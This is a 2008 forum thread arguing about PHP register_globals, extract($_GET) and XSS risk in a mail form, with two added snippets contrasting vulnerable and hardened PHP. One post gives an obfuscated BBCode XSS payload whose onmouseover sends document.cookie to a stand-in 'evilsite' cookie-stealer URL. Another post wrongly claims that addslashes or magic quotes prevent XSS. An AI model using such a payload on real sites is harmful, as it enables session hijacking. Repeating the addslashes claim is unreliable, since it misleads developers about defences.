

  1. #21
    Join Date
    Jun 2008
    Location
    Manchester
    Posts
    766
    Tokens
    0

    Quote Originally Posted by Iszak View Post
    Jxhn, are you a complete noob that wants to act as if you know what you're talking about, because that's what it seems like. Firstly by making a page called file.php with the following code
    PHP Code:
    <?php echo $lol?>
    and then going to the url file.php?lol=John it will not output "John" it will output nothing! because $lol isn't assigned to any variable. You can get it like that though by using extract($_GET); such example is like
    PHP Code:
    <?php
    extract($_GET);
    echo $lol;
    ?>
    but other than that, your comment makes you look like an idiot. Secondly I said nothing about XSS or SQL Injections, I was simply only using what the guy who posted used and the negatives of using it. Thirdly XSS attacks can be dangerous, by using it they could add javascript in which could result in a hijack of their session etc. just have a look at a XSS example by wikipedia.
    Yeah, no real XSS danger there!

    Excellent2 - That's only a snippet of the original code but that's the general idea it was mainly from Dilore though.

    Seriously Jxhn if you're going to make claims at least have the knowledge to back it up.
    No, I know what I'm talking about, because it's only very simple php. Which is why I don't reply to a lot of other topics.

    Try the file yourself before having a fit at me. How do you think variable poisoning works? It's because variables don't have to be declared.
    http://johnphptest.freehostia.com/loljohn.php?lol=John

    And as for the XSS I wasn't talking to you specifically about that, but there's no danger, because it's being sent to an email. So unless the email site is vulnerable to XSS then there is no vulnerability. And if it was then attackers could send emails themselves without his form, provided they knew the address.

  2. #22

    FreeHostia obviously extracts the variables, but majority of servers do not do this, if you actually had your own host you'll be able to tell, here look at my example then get a real host. http://iszak.net/lolatjxhn.php?jxhn=Noob now do you see - on a real host echo $jxhn does not output "Noob" because most hosts are not crap free hosts. Also if you read what I quoted about XSS you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.

    1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
    2. Alice clicks on the link.
    3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.
    4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.
    5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.
    oh what's that on the first line?

    1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.
    WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.

    Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.
    Last edited by Iszak; 28-10-2008 at 04:53 PM.

  3. #23
    Join Date
    Sep 2007
    Posts
    220
    Tokens
    175

    Iszak usually knows what he is talking about, he's done many scripts for me that work fine.
    Kindest Regards,
    -- Brad

  4. #24
    Join Date
    Jul 2008
    Location
    Hastings, UK.
    Posts
    2,050
    Tokens
    0

    Quote Originally Posted by Iszak View Post
    FreeHostia obviously extracts the variables, but majority of servers do not do this, if you actually had your own host you'll be able to tell, here look at my example then get a real host. http://iszak.net/lolatjxhn.php?jxhn=Noob now do you see - on a real host echo $jxhn does not output "Noob" because most hosts are not crap free hosts. Also if you read what I quoted about XSS you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.

    oh what's that on the first line?

    WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.

    Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.
    I agree that he's making himself look like a bigger noob than he already is.

  5. #25
    Join Date
    Jun 2008
    Location
    Manchester
    Posts
    766
    Tokens
    0

    Quote Originally Posted by Iszak View Post
    FreeHostia obviously extracts the variables, but majority of servers do not do this, if you actually had your own host you'll be able to tell, here look at my example then get a real host. http://iszak.net/lolatjxhn.php?jxhn=Noob now do you see - on a real host echo $jxhn does not output "Noob" because most hosts are not crap free hosts. Also if you read what I quoted about XSS you could see that the form does pose a threat if gpc magic quotes is disabled and no stripping is done. READ.

    oh what's that on the first line?

    WOW USING AN EMAIL! Hence my point, if they enter their content and send it - they could potentially add their own hyperlink, the receiver of the email can then go from there look at no. 2 onwards. I think I know a little more about PHP than you, and you're only making yourself look like a bigger noob.

    Edit: And if the host did this for both $_GET and $_POST data, well this could cause conflicts if the naming is the same, I'm sure there is a reason why most hosts have this 'feature' disabled.
    Well, sorry. I'd always thought they didn't need to be declared. It's something to do with the php settings about register globals I think. You must have been right.

    I still don't agree on the XSS side though. All of those sorts of things have been patched by browsers for years, and why would the link have to have been sent through email? If they were easily possible then the link I sent you back there could have done it to you. I don't consider what you described to be XSS. XSS is not prevented by magicquotes or addslashes btw.

    The reason I don't have my own host is because I don't have any websites and I'm not gonna buy one just to mess about.

    I think you need to grow up a little though, calling someone a noob when they oppose you, even if they're wrong will just make you look immature. It's like when someone calls a chav gay (no offence to homosexuals (or chavs)). Like many others in the coding community here I think you just need to calm down a bit. If I said "I think I know little more about XSS and SQL injections than you", you'd think I was being cocky.
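
Added example (not part of any post in this thread): the behaviour under dispute, where `register_globals` or `extract($_GET)` turns request parameters into variables, shown beside reading the one expected key. The function names, the `is_admin` parameter and the `$request` array standing in for `$_GET` are assumptions made for illustration.

```php
<?php
// Added example. $request stands in for $_GET from a constructed URL such as
// page.php?lol=John&is_admin=1; the function names are hypothetical.

// Mimics register_globals / extract($_GET): every request key becomes a variable.
function render_extracted(array $request): string
{
    $is_admin = false;      // value the script meant to control itself
    extract($request);      // default EXTR_OVERWRITE replaces $is_admin
    $name = isset($lol) ? $lol : '';
    return ($is_admin ? 'admin:' : 'user:') . $name;
}

// Reads only the key it expects and encodes it for HTML output.
function render_explicit(array $request): string
{
    $is_admin = false;      // cannot be reached from the request
    $name = (isset($request['lol']) && is_string($request['lol']))
        ? $request['lol']
        : '';
    return ($is_admin ? 'admin:' : 'user:')
        . htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
}

// Constructed sample input: one expected key and one the script never asked for.
$request = ['lol' => 'John', 'is_admin' => '1'];

echo render_extracted($request), "\n";   // request decides the privilege flag
echo render_explicit($request), "\n";    // flag stays under the script's control
```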

  6. #26

    Firstly you're right the link you sent could easily have done it. Secondly that example is from wikipedia, now yes anyone can edit wikipedia but it's likely to be correct as it's moderated. Thirdly XSS can be prevented via addslashes or magicquotes, for example by using addslashes you may prevent people from inserting javascript. This is XSS. Thirdly, if you say you knew a little more about XSS and SQL injections than me, I'd probably believe you although I would question it somewhat. I'm not into XSS and SQL Injections massively - more so PHP. But if someone is going to tell me that I'm wrong when I've got experience under my belt, I'm not going to allow you to walk all over me and say some incorrect information in which other people might believe. That is why I was immature and called you a noob, because you were stubborn and wouldn't believe me - but then again you have no reason to believe me.

  7. #27
    Join Date
    Jun 2008
    Location
    Manchester
    Posts
    766
    Tokens
    0

    Quote Originally Posted by Iszak View Post
    Firstly you're right the link you sent could easily have done it. Secondly that example is from wikipedia, now yes anyone can edit wikipedia but it's likely to be correct as it's moderated. Thirdly XSS can be prevented via addslashes or magicquotes, for example by using addslashes you may prevent people from inserting javascript. This is XSS. Thirdly, if you say you knew a little more about XSS and SQL injections than me, I'd probably believe you although I would question it somewhat. I'm not into XSS and SQL Injections massively - more so PHP. But if someone is going to tell me that I'm wrong when I've got experience under my belt, I'm not going to allow you to walk all over me and say some incorrect information in which other people might believe. That is why I was immature and called you a noob, because you were stubborn and wouldn't believe me - but then again you have no reason to believe me.
    Thanks for the recognition.

    Btw example of XSS without quotes:
    Code:
    [image]http://somesite.com/transparentimage.gif  height=100 width=100% onmouseover=document.location=String.fromCharCode(104,116,116,112,58,47,47,101,118,105,108,115,105,116,101,46,99,111,109,47,115,116,101,97,108,101,114,46,112,104,112,63,99,111,111,107,105,101,61)+document.cookie       style=position:absolute;left:0px;top:0px   [/image]
    This thread has got quite off topic, so this will probably be my last post in it.
    Last edited by Jxhn; 29-10-2008 at 11:39 AM.
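
Added example (not from the thread): why quote escaping leaves a quote-free payload like the one above untouched, and what does stop it. The injected attributes depend on the URL landing in an unquoted attribute, so the hardened version validates the URL and emits a quoted, encoded value. The function names and the sample input are constructed for illustration.

```php
<?php
// Added example. render_image_unsafe / render_image_safe are hypothetical names;
// the input is a constructed, harmless stand-in for an unquoted-attribute payload.

// Before: the URL goes into an unquoted attribute, so a space ends the value
// and whatever follows is parsed as further attributes.
function render_image_unsafe(string $url): string
{
    return '<img src=' . addslashes($url) . '>';
}

// After: accept only absolute http(s) URLs without whitespace, then emit a
// quoted, HTML-encoded attribute value.
function render_image_safe(string $url): ?string
{
    if (preg_match('/\s/', $url) || filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;
    }
    return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">';
}

// Constructed sample: contains no quotes, backslashes, angle brackets or ampersands.
$input = 'http://example.com/a.gif onmouseover=alert(1)';

// addslashes() has nothing to escape, so the string passes through unchanged.
var_dump(addslashes($input) === $input);

// htmlspecialchars() alone does not change it either: the problem is the
// unquoted attribute context, not a missing entity encoding.
var_dump(htmlspecialchars($input, ENT_QUOTES, 'UTF-8') === $input);

echo render_image_unsafe($input), "\n";                  // extra attribute survives
var_dump(render_image_safe($input));                      // rejected
echo render_image_safe('http://example.com/a.gif'), "\n"; // plain URL is rendered
```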
